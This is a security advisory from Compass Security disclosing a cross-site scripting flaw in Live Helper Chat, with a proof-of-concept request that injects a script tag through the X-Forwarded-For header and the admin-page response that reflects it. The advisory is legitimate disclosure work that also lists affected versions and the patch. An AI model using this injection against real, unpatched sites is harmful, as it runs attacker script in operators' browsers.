############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/en/research/advisories/ ############################################################# # # CSNC ID: CSNC-2017-004 # Product: Live Helper Chat [1] # Vendor: Live Helper Chat # Subject: Cross-Site Scripting - XSS # Risk: High # Effect: Remotely exploitable # Author: Sylvain Heiniger (sylvain.heiniger@xxxxxxxxxxxxxxxxxxxx) # Date: April 24, 2017 # ############################################################# Introduction: ---------------- Live Helper Chat is a live chat support for websites. It provides a simple solution for companies to get in contact with visitors of their websites. [1] Compass Security discovered a web application security flaw in the Live Helper Chat application which allows an attacker to execute JavaScript code in the browser of a user. This allows, for instance, attacking the user's browser or redirecting the user to a phishing website. The attack will be in some cases automatically run in the backend operator's session. Otherwise, one can send the victim a link to the website with the malicious payload. Affected Versions: ----------------------- The following Live Helper Chat versions are vulnerable: - 2.06v - 2.58v [2] Patches: ----------- Live Helper Chat released a patch as part of release 2.60v [3, 4]. Technical Description: ----------------------------- Live Helper Chat detects the visitor's IP address. To this end, it reads the "X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this header. It will be reflected in the administrator's "online users" information page as well as in the "print chat" page. User's request: =============== POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1 Host: localhost X-Forwarded-For: <script>alert(1);</script> Connection: close Content-Length: 188 Username=Example&Question=My+question&user_timezone=2&URLRefer=%2F%2Flocalhost%2F&r=&operator=0&StartChat=1&captcha_1977271e431742414c31477d258028664d713ae0=1475518554&tscaptcha=1475518554 =============== Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with: =============== [{"id":"1","ip":"<script>alert(1);<\/script>","vid":"47428qicplsqmfe9huq2", [JSON MESSAGE CUT] =============== Note: the above JSON response is sent by the application with the content-type text/html, making it vulnerable to XSS as is. Milestones: --------------- 2017-03-14: Vulnerability discovered 2017-04-23: Vendor notified 2017-04-23: Vendor provided patched version 2017-04-28: Public disclosure References: --------------- [1] https://github.com/LiveHelperChat/livehelperchat/ [2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f52098d578883ef8d069313d460ec [3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html [4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fed613c5e306152ea60255edba2